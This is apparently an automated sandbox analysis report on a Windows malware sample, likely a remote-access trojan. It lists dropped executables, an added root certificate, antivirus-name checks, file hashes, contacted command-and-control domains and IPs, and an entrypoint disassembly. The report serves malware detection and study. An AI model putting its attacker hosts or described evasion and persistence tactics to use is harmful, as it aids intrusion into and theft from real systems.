Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Process information set: NOOPENFILEERRORBOX

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe

5_2_00441F3C

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)

Show sources

Source: 40D19FBA73C6B011814E2C6920E8792F.exe

Binary or memory string: mbam.exe

Adds / modifies Windows certificates

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 Blob

Language, Device and Operating System Detection:

Contains functionality to query local / system time

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe

Code function: 10_2_004081D8 GetLocalTime,

10_2_004081D8

Contains functionality to query windows version

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

Code function: 2_2_0040A6C0 GetVersionExA,

2_2_0040A6C0

Contains functionality locales information (e.g. system language)

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	2_2_00405B44
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: GetLocaleInfoA,GetACP,	2_2_0040AA6C
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: GetLocaleInfoA,	2_2_0040976C
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: GetLocaleInfoA,	2_2_004097B8
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	2_2_00405C50
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	2_1_00405B44
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: GetLocaleInfoA,GetACP,	2_1_0040AA6C
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: GetLocaleInfoA,	2_1_0040976C
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: GetLocaleInfoA,	2_1_004097B8
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	2_1_00405C50
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	5_2_00405B44
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: GetLocaleInfoA,GetACP,	5_2_0040AA6C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: GetLocaleInfoA,	5_2_0040976C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: GetLocaleInfoA,	5_2_004097B8
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	5_2_00405C50
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	5_1_00405B44
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: GetLocaleInfoA,GetACP,	5_1_0040AA6C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: GetLocaleInfoA,	5_1_0040976C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: GetLocaleInfoA,	5_1_004097B8
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	5_1_00405C50
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	6_2_00405B44
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: GetLocaleInfoA,GetACP,	6_2_0040AA6C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: GetLocaleInfoA,	6_2_0040976C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: GetLocaleInfoA,	6_2_004097B8
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	6_2_00405C50
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	6_1_00405B44
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: GetLocaleInfoA,GetACP,	6_1_0040AA6C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: GetLocaleInfoA,	6_1_0040976C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: GetLocaleInfoA,	6_1_004097B8
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	6_1_00405C50
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	7_2_00405B44
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetLocaleInfoA,GetACP,	7_2_0040AA6C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetLocaleInfoA,	7_2_0040976C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetLocaleInfoA,	7_2_004097B8
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	7_2_00405C50
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	7_1_00405B44
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetLocaleInfoA,GetACP,	7_1_0040AA6C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetLocaleInfoA,	7_1_0040976C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetLocaleInfoA,	7_1_004097B8
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	7_1_00405C50
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	10_2_0040551C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetLocaleInfoA,	10_2_004097A4
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetLocaleInfoA,	10_2_00409758
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	10_1_0040551C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	10_1_00405628
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetLocaleInfoA,	10_1_004097A4
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetLocaleInfoA,	10_1_00409758
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	11_2_004068F0
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: GetLocaleInfoA,	11_2_0040D17C
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: GetLocaleInfoA,	11_2_0040D130
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	12_2_00405B44
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: GetLocaleInfoA,GetACP,	12_2_0040AA6C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: GetLocaleInfoA,	12_2_0040976C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: GetLocaleInfoA,	12_2_004097B8
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	12_2_00405C50
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	12_1_00405B44
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: GetLocaleInfoA,GetACP,	12_1_0040AA6C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: GetLocaleInfoA,	12_1_0040976C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: GetLocaleInfoA,	12_1_004097B8
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	12_1_00405C50

Queries the cryptographic machine GUID

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Yara Overview

No Yara matches

Screenshot

Startup

system is w7

40D19FBA73C6B011814E2C6920E8792F.exe (PID: 3336 MD5: 40D19FBA73C6B011814E2C6920E8792F)

40D19FBA73C6B011814E2C6920E8792F.exe (PID: 3388 MD5: 40D19FBA73C6B011814E2C6920E8792F)

FB_3449.tmp.exe (PID: 3408 MD5: FBDEC6F2A565E5B6844A7DE2F785EC88)

FB_3449.tmp.exe (PID: 3552 MD5: FBDEC6F2A565E5B6844A7DE2F785EC88)

java.exe (PID: 3768 MD5: FBDEC6F2A565E5B6844A7DE2F785EC88)

FB_3804.tmp.exe (PID: 3416 MD5: BA2A65C19C961A51739E28DF238FB0EA)

FB_3804.tmp.exe (PID: 3544 MD5: BA2A65C19C961A51739E28DF238FB0EA)

FB_390E.tmp.exe (PID: 3424 MD5: 9C306303F6656435500A6A3C53793758)

FB_390E.tmp.exe (PID: 3560 MD5: 9C306303F6656435500A6A3C53793758)

iexplore.exe (PID: 3608 MD5: 363BC25BACB34E9D40441968B1B3D5BE)

notepad.exe (PID: 3376 MD5: D378BFFB70923139D6A4F546864AA61C)

cleanup

Created / dropped Files

File Path	Type and Hashes
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\551	Type: SQLite 3.x database MD5: E491A7DFEBE81A0444A44E56C114C03E SHA: D43BB057FBA42793231CBE32984B35358E1A6E90 SHA-256: 4306B46B925C4FF8228A73D57BA5909AE9A14BEF287E61868DFE4A35999D0689 SHA-512: 63A697BC226206C75079721CB2E15407E0657F9404C30098589B7431B309D079AD1F4940F5F16BC091ABB877520C3AD4FD120FEED633FA90F03E4C7E5D648746
C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Type: PE32 executable (GUI) Intel 80386, for MS Windows MD5: FBDEC6F2A565E5B6844A7DE2F785EC88 SHA: 210D0CCF0878C0257CD6158FE01405333BE5730C SHA-256: CBAA6C3475FAA7B305F7524755859D3FD1B8AE8F4B334F80A479552631F61BB4 SHA-512: A566FA069E6F17AB91B55FCE7DD7C48E9B4EE20B21BA4803CCEF4F9FF99E81395DC6685B1B14BBB2A91377BDAF6FF26B8EB9777FA4B818089E7DF3911DD3E798
C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Type: PE32 executable (GUI) Intel 80386, for MS Windows MD5: BA2A65C19C961A51739E28DF238FB0EA SHA: 61FD21838A66CF1C832E5600B2601E3EDC03E259 SHA-256: AF33E6BE8F4E92A6053AF73DEB177A81AA59E91B65E22F1665D9A88CFDAC361E SHA-512: BC5AB1305E6E0FBA21D4D40DB7AD2D91E33C09CA80C52F0370B5DF36BA549A694FE0C724FB299B3988907EF868F82A37F81F23755FC738A1A338909E82D7D8B4
C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Type: PE32 executable (GUI) Intel 80386, for MS Windows MD5: 9C306303F6656435500A6A3C53793758 SHA: 0641EEAB532C3196FEE671FDD0E4E2640D119C0E SHA-256: 4397CD2133A1468C9A494C28689DBE5E00A1FD23157B0E0F6773C80B2CF0DB3E SHA-512: D89AF83FEA59469C968F3B97847D9D3B58DE066BB4C3852CB6AFE3F4C7DAB1C63108A05D95163B3EAF6AACD17D0B6AF9BF577AD39B1C12B36138D7907E8E78E6
C:\Users\admin\AppData\Local\Temp\tmpCA5F.tmp	Type: UTF-8 Unicode text, with CRLF line terminators MD5: 83C0873941E1D44A31C558984C177C6A SHA: 43008EEB9BC6C63E1BE7E2373935F05E57E8803C SHA-256: 758F0A6DCCF41D918E16D754EDC4BFF10D0FEAB57A083D4528C2266D247BC57E SHA-512: A70AE13B3A30267C124C854C78A6F096545C88CCA92F99C0804C23E9A9D0FABEA8040026D81B78BF642410CF1CEDDDEF1059AB76DE9452E483D13DF316C27EEC
C:\Users\admin\AppData\Roaming\8357.bcf	Type: data MD5: 96D03A240C9A95F42D0E19015BB06E7A SHA: 6D1E04CD063D82C40E7987DCF94544023C6EE3B0 SHA-256: D114A20CD6E0F3C6DAE6FF1D6EAEE4C9F017FEEBA46DF892025B61275BAECD49 SHA-512: 5B3C60073C13546D54151039227353712736978ADFDB77EE8718D0D2D0A5D98F9B1B5AB89A6882FFC75C47645BF21FDB2E09461DD8FD52831868D1E72304D393
C:\Users\admin\AppData\Roaming\9567.enc	Type: HTML document, ASCII text, with CRLF line terminators MD5: 5251D79CC4A1F35CCA566AF49C3D7848 SHA: 027BCB8C7DB27DD4E34C4AC2689C6336EDD3A555 SHA-256: 7426B6428172414D7FECD3472CEAA77D58CF849585E76D48B208574C33963D1C SHA-512: 61F2E5A3659FE70F91F457709248B03BE80C0CEC31B04497C6F71C2C66B21F3A6A30B8A5401E754B556F15B032B1B97489435CBB09D284726EF8EEA1654D9201
C:\Users\admin\AppData\Roaming\Default NFolder\Default File.exe	Type: PE32 executable (GUI) Intel 80386, for MS Windows MD5: BA2A65C19C961A51739E28DF238FB0EA SHA: 61FD21838A66CF1C832E5600B2601E3EDC03E259 SHA-256: AF33E6BE8F4E92A6053AF73DEB177A81AA59E91B65E22F1665D9A88CFDAC361E SHA-512: BC5AB1305E6E0FBA21D4D40DB7AD2D91E33C09CA80C52F0370B5DF36BA549A694FE0C724FB299B3988907EF868F82A37F81F23755FC738A1A338909E82D7D8B4
C:\Users\admin\AppData\Roaming\IPS\ips.exe	Type: PE32 executable (GUI) Intel 80386, for MS Windows MD5: 9C306303F6656435500A6A3C53793758 SHA: 0641EEAB532C3196FEE671FDD0E4E2640D119C0E SHA-256: 4397CD2133A1468C9A494C28689DBE5E00A1FD23157B0E0F6773C80B2CF0DB3E SHA-512: D89AF83FEA59469C968F3B97847D9D3B58DE066BB4C3852CB6AFE3F4C7DAB1C63108A05D95163B3EAF6AACD17D0B6AF9BF577AD39B1C12B36138D7907E8E78E6
C:\Users\admin\AppData\Roaming\Imminent\Logs\07-09-2015	Type: data MD5: 46741E19A5D8E64E3D3D2FBF1D22558D SHA: B438C729773C40CE3E31A2620E6BD6362B85162A SHA-256: 41F8D735DB1DE55FED273703A365927D268B46DFB53925C09C872946EE14D859 SHA-512: D9662CFB6231E88F3908D5052B868339330A1F14FBA81826EA9A5A06F92EB75DD5671018D3868E15A18D7409E142B5C754D4B7C00EA012AB73B128E41A4D11CA
C:\Users\admin\AppData\Roaming\Java\java.exe	Type: PE32 executable (GUI) Intel 80386, for MS Windows MD5: FBDEC6F2A565E5B6844A7DE2F785EC88 SHA: 210D0CCF0878C0257CD6158FE01405333BE5730C SHA-256: CBAA6C3475FAA7B305F7524755859D3FD1B8AE8F4B334F80A479552631F61BB4 SHA-512: A566FA069E6F17AB91B55FCE7DD7C48E9B4EE20B21BA4803CCEF4F9FF99E81395DC6685B1B14BBB2A91377BDAF6FF26B8EB9777FA4B818089E7DF3911DD3E798

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active
ip4.telize.com	46.19.37.108	true
www.google.com	216.58.208.196	true
degreat248.no-ip.org	197.211.52.12	true
smtp.zoho.com	74.201.154.90	true
degreat.host56.com	31.170.160.229	true

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name
197.211.52.12	Nigeria	37148	GlobacomLimited
8.8.8.8	United States	15169	GoogleInc
74.201.154.90	United States	2639	unknown
46.19.37.108	Netherlands	23456	32bitTransitionAS
216.58.208.196	United States	15169	GoogleInc
31.170.160.229	United States	47583	HostingerInternationalLimited

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
TrID:	Win32 Executable Delphi generic (14689/80) 43.36% Windows Screen Saver (13104/52) 38.68% Win16/32 Executable Delphi generic (2074/23) 6.12% Generic Win/DOS Executable (2004/3) 5.91% DOS Executable Generic (2002/1) 5.91%
File name:	40D19FBA73C6B011814E2C6920E8792F.exe
File size:	2423296
MD5:	40d19fba73c6b011814e2c6920e8792f
SHA1:	b4f7506d3413ab14b33922596ae7c624929012da
SHA256:	dd1f59427ab351abe5f981cba62402ecfb88030d0571bdead83d9fedd4d1cdab
SHA512:	81d6fd9b5dc8c6bb657507a0d3ced6505ee1bb20ce8de084f7016459dd92e0ab1be392d516cd92459b54591d672afbf2a80426423883535e2f5a88110a5e86f0

File Icon

Static PE Info

General
Entrypoint:	0x45bcdc
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui 40
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x53B85080 [Sat Jul 5 19:22:40 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	00c5c2b830cded07083a41d14be88428

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0045BB5Ch
call 00007F3EACEEDAFDh
mov eax, dword ptr [00463518h]
mov eax, dword ptr [eax]
call 00007F3EACF3E101h
mov ecx, dword ptr [004635F8h]
mov eax, dword ptr [00463518h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0045B31Ch]
call 00007F3EACF3E101h
mov eax, dword ptr [00463518h]
mov eax, dword ptr [eax]
call 00007F3EACF3E175h
call 00007F3EACEEB608h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
